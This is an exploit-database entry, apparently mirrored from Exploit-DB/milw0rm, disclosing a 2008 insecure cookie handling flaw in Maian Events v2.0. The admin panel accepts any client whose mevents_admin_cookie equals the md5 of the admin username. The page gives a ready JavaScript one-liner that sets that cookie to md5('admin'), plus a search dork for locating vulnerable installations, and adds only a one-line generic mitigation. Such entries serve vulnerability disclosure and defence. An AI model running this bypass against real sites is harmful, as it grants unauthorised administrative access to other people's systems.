header-logo
Suggest Exploit
vendor:
Maian Events
by:
Saime
7.5
CVSS
HIGH
Insecure Cookie Handling
264
CWE
Product Name: Maian Events
Affected Version From: Maian Events v2.0
Affected Version To: Maian Events v2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:maian_script_world:maian_events:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Maian Events v2.0 Insecure Cookie Handling Vulnerability

Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie, equals admin username(md5). An exploit can be achieved by setting the cookie value to md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin

Mitigation:

Ensure that the application is properly validating and sanitizing user input before using it in cookie values.
Source

Exploit-DB raw data:

Author: Saime
Date: July 12, 2008
Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Maian Events v2.0 Copyright © 2005-2008 Maian Script World. All Rights Reserved

Description:
Maian Events v2.0 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mevents_admin_cookie,
equals admin username(md5)

Exploit:
javascript:document.cookie = "mevents_admin_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin

# milw0rm.com [2008-07-12]